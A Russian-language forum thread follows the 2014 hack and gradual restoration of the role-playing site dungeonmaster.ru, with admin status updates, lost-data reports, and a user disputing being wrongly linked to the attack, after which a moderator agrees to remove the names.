| Цитата(Зерг) Нет, не пытались. Когда речь шла о мотивах Менша, то сказали, что он обещал отомстить администрации и что он этого так не оставит. Нак Рош сам увидел там политику, еще приплел евреев и мировые заговоры, лол. подробности не имеют весомости. я просто попытался дать понять, что никто не ловит лулзы с трагедии (ну лично для меня так) форумных игр. |
| Автор: Anderwertz - 26.8.2014, 17:12 |
| Знаете ли, ДМ мне тоже не безразличен, понимаете ли я там тоже играл.. В котиков... Это не повод устраивать срач и флуд. Просто ждите когда он аки феникс возродится из пепла. |
| Автор: AlarDyce - 26.8.2014, 20:31 |
| Опять же трансляция. Цитата КОРОТКО О ГЛАВНОМ. 1. На сайте активно ведутся восстановительные работы; выстраиваются редуты против всякого рода инъекций и атак; меняются небезопасные механизмы на безопасные. 2. Ожидаемое возвращение сайта в строй - вечер четверга. 3. Rakot нас покинул, но дело его живо, силами всех ДМчан и, в частности, нового админа - Odinarius'а. 4. После восстановления сайта в фоновом режиме продолжится работа по разработке новой версии ДМа под кодовым названием DM3. Новости о ней будут появляться на сайте в последующие недели. PS: По вопросам о состоянии сайта и скорости завершения восстановительных работ просьба обращаться только по истечении дедлайна. Но все будет, господа, и в наилучшем виде. |
| Автор: AlarDyce - 28.8.2014, 23:06 |
| Цитата Попытка держать народ в курсе происходящего. 1. Подняли пока что сайт на тестовом домене, проверяем на наличие старых дыр. 2. Базу данных приходится собирать буквально по частям, так что велика вероятность, что какие-то части все-таки пропадут. |
| Автор: Аскетолог - 29.8.2014, 13:17 |
| Хм, и когда ожидать его(сайта) "воскрешения для всех"? |
| Автор: AlarDyce - 29.8.2014, 13:25 |
| Точно не знает никто. Пока в процессе. Цитата(из Фейсбука) Черт, это просто коллекция дыр какая-то. Уже такая пачка коммитов в дело пошла. Но скоро я с ними закончу. Однако, проблема в том, что до сих пор не получается полноценно залить бэкап. |
| Автор: Вейлор - 29.8.2014, 23:47 |
| С потерями (похоже проблем оказалось больше, чем можно было предполагать), но на финишной прямой. Цитата(http://dungeonmaster.ru/) 1. База данных успешно восстановлена. Скажем честно, не полностью. Однако: 1.1. Сообщения на форуме восстановлены до 22го марта этого года. Это значит, что ЛИТЕРАТУРНЫЙ КОНКУРС ПОЛНОСТЬЮ ВОССТАНОВЛЕН. 1.2. Банлог восстановлен тоже до того момента. Однако, баны вроде как живы. Это сложный момент, надо еще щупать. 1.3. Сообщения в обсуждах восстановлены до той же даты. 1.4. В общей сложности мы потеряли почти 100к сообщений с форума и обсуждов игр. Минута молчания. 2. Файлы, аватарки и аттачменты утеряны полностью. Можно считать это оплошностью, поскольку я пропустил возможность стырить их с прошлого FTP до того как Юра закрыл свой аккаунт, а можно порадоваться, что загруженные скрипты тоже успешно утеряны. Очень жаль, что так получилось, извините. 3. На тестовой протыкано больше половины страничек, старательно тыкаю остальную половину. Через пять минут попробую восстановить базу уже на боевой и примусь за протыкивание там. Как только буду уверен, что все работает (в течение ночи, я полагаю), уберу заглушку. - Odinarius |
| Автор: AlarDyce - 30.8.2014, 05:04 |
| Ну и самый последний апдейт. Цитата Ребят, не могу, глаза закрываются уже. Не додумался пива взять себе. Однако ж, БАЗУ ВОССТАНОВИЛ. Осталось только залить защиту написанную другими труженниками и протыкать ее. Завтра все точно будет. ОЧЕНЬ ВАЖНО!!! Пользователи с никами Tarvagorn и Саюри, напишите мне на quilin@yandex.ru письмо с каким-нибудь подтверждением того, что вы - это вы, и с мылом, которое у вас должно быть. - Odinarius |
| Автор: AlarDyce - 31.8.2014, 10:30 |
| И длинная финишная прямая. Цитата(Владислав Килин) 11 ч. Переношу модули. В процессе. Предсказывать уже не особо получается. На очереди: 1. Персонажи. 2. Посты. 3. Настраиваемые характеристики. И ВСЕ, ВКЛЮЧИМ ДМЧИК!!! 2 ч. Семь часов переносятся характеристики. Пипец просто. |
| Автор: AlarDyce - 1.9.2014, 18:56 |
| Всем радоваться, http://www.dungeonmaster.ru (% |
| Автор: Боб - 1.9.2014, 19:09 |
Поздравляю! |
| Автор: Вейлор - 1.9.2014, 22:36 |
| О, круто. Я даже смог залогиниться под старым профилем) Поздравляю. |
| Автор: bookwarrior - 2.9.2014, 01:55 |
| Странно, у меня что-то после выполнения их просьбы сменить пароль зайти не получается. |
| Автор: AlarDyce - 2.9.2014, 03:48 |
| На воду дуют, то есть, перестраховались еще раз от угонов ололоши. Меня тоже скинуло, хоть пароль и почту сменил вчера при входе, но, правда, попустило снова без проблем. А как раз для тех, у кого зайти не получается, выложены реквизиты. Текст спрятан. Кликнуть для отображения. |
| Автор: Карнаух - 24.10.2014, 11:35 |
| Даамц - решил поискать ссылки в яндексе на свой сайтец и на такое наткнулся. Узнал про себя много нового=)Ток вот ваши ФРПГ мне явно были неинтересны. С чего вы вообще прикрепили меня к данному взлому? |
| Автор: Карнаух - 24.10.2014, 11:58 |
| Да и для справки домен ololosha.esy.es был моим. Как и karnaukh.tk. Домен на котором были инструменты для взлома ФРПГ мне не знаком. Следопыты из вас никудышные. И к тому же не вижу связи между моей ненавистью к Путину и прочим политическим контрацептивам с причиной для взлома. Я всё таки в свои 15-16 тоже зависал на ФРПГшке. |
| Автор: Вейлор - 24.10.2014, 13:07 |
| Ссылки на соц.сети и имена будут стерты сегодня примерно через 3 часа т.к. предположения о связи с хацкером не нашли реального подтверждения. Мои извинения что не сделал это раньше. Сначала надеялся на новую информацию, потом тема забылась. Из последней более-менее интересной информации было похоже что концы вели в Москву или Питер. Но и это не факт что были реальные IP. Известные еМайлы использовались одноразовые. Как рядовые пользователи интернета, без данных провайдеров и хостеров (а возможно и с ними) мы уже похоже ничего не узнаем, да и как я понимаю интерес уже у всех угас. |